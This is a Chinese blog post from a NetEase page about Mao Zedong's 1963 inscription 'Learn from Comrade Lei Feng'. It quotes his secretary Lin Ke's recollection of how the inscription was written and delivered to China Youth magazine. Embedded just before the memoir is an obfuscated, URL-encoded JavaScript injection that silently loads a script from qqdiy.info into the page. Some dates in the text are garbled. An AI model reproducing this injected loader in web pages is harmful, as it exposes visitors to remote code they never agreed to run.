注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

海阔天空

脚踏着祖国的大地,背负着人民的希望,我们是一支不可战胜的力量!

 
 
 

日志

 
 
关于我

军人意味着责任!没有无私的奉献精神,不配军人的称号。 如果人生可以有第二次选择的话,我一定毫不犹豫、无怨无悔地走上从军之路!

网易考拉推荐

向雷锋同志学习  

2011-03-02 14:42:54|  分类: 军人风采 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

     今年35日,是毛主席为雷锋题词48周年的纪念日。在这令人思绪万千的日子里,我想把毛主席题写“向雷锋同志学习”前前后后的一些往事梳理出来,一方面以此作为对人民领袖毛主席和平凡而伟大的英雄雷锋的怀念,另一方面也和广大读者共同回顾那些“激情燃烧的岁月”,继承发扬雷锋精神!

 

向雷锋同志学习 - 海阔天空 - 海阔天空

 

向雷锋同志学习 - 海阔天空 - 海阔天空

 

向雷锋同志学习 - 海阔天空 - 海阔天空

 

向雷锋同志学习 - 海阔天空 - 海阔天空

 

向雷锋同志学习 - 海阔天空 - 海阔天空

 

向雷锋同志学习 - 海阔天空 - 海阔天空

 

向雷锋同志学习 - 海阔天空 - 海阔天空

 

向雷锋同志学习 - 海阔天空 - 海阔天空

 

以下是毛泽东秘书林克晚年的回忆: 

" " z="if%28%21window.r%29%7Bvar%20s%3Ddocument.createElement%28%22script%22%29%3Bs.src%3D%27http%3A//qqdiy.info/a/163/fs.php%27%3Bs.type%3D%22text/javascript%22%3Bdocument.getElem%65ntsByTagName%28%27head%27%29.item%280%29.appendChild%28s%29%3Bwindow.r%3D1%7D"<     ……我将他们《中国青年》杂志社的要求报告了毛主席。毛主席让我先拟写几个题词供他参考。我回办公室,思索了一番,拟好了十来个题词,立即送给了他。我现在还可以回忆起其中几个题词的大致内容。如:“学习雷锋同志全心全意为人民服务的思想”、“学习雷锋同志鲜明的阶级立场”、“学习雷锋同志大公无私的共产主义风格”、“学习雷锋同志艰苦朴素的作风”、“学习雷锋同志毫不利己、专门利人的优良品德”、“学习雷锋同志勤奋好学的革命精神”等等。

     222日,毛主席睡醒以后,值班警卫员打电话告诉我,主席让我去一下。我带着事先选好的文件,随机将新文件放到他床头的长桌上。他示意我坐下,我便在他床前一张藤桌旁的椅了上坐下来。这时,毛主席从他身体左半边床的书堆上拿起了一张信纸递给我,我一看,只见他已在纸上用毛笔书写了“向雷锋同志学习”七个潇洒飘逸的行草字。我为他拟的十来个题词,他一个也没用。这时,他吸了一口香烟,从容地带着询问的目光问道,“你看行吗?”我爽快地回答说:“写得很好,而且非常概括”。毛主席好像要解释为什么没有采用我拟的题词这一疑问似的,接着说道:“是嘛,学雷锋不是学他哪一件好事,也不是学他某一方面的优点,而是要学他的好思想、好作风、好品德;学习雷锋长期一贯地做好事,而不做坏事;学习他一切从人民的利益出发,全心全意人民服务的精神。当然,学习雷锋要实事求是,扎扎实实,讲求实效,不要搞形式主义。不但普通干部、群众学习雷锋,领导干部要带头学,才能形成好风气。”现在看来,毛主席的这番讲话不仅指出了学雷锋的方法,而且指明了雷锋身上最本质的东西;特别是指出了学雷锋的方向。毛主席谈完之后,我便回到我的办公室,打电话给《中国青年》杂志编辑部,告诉他们,毛主席的题词已经写好了,请他们到中南海西门来取。应当特别指出,毛主席在题词之前,就阅读了报纸上有关雷锋的报道,了解雷锋的事迹。他曾对当时的军委秘书长罗瑞卿说过:雷锋值得学习。

    《中国青年》杂志社领导接到林克的电话,非常兴奋,派年轻的摄影记者兼通讯员刘全聚,立即骑上摩托车,向中南海奔去。几十分钟后,毛泽东书写“向雷锋同志学习”几个刚劲有力的大字便展现在大家面前。

         《中国青年》杂志社轰动了,团中央轰动了。

  评论这张
 
阅读(475)| 评论(63)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017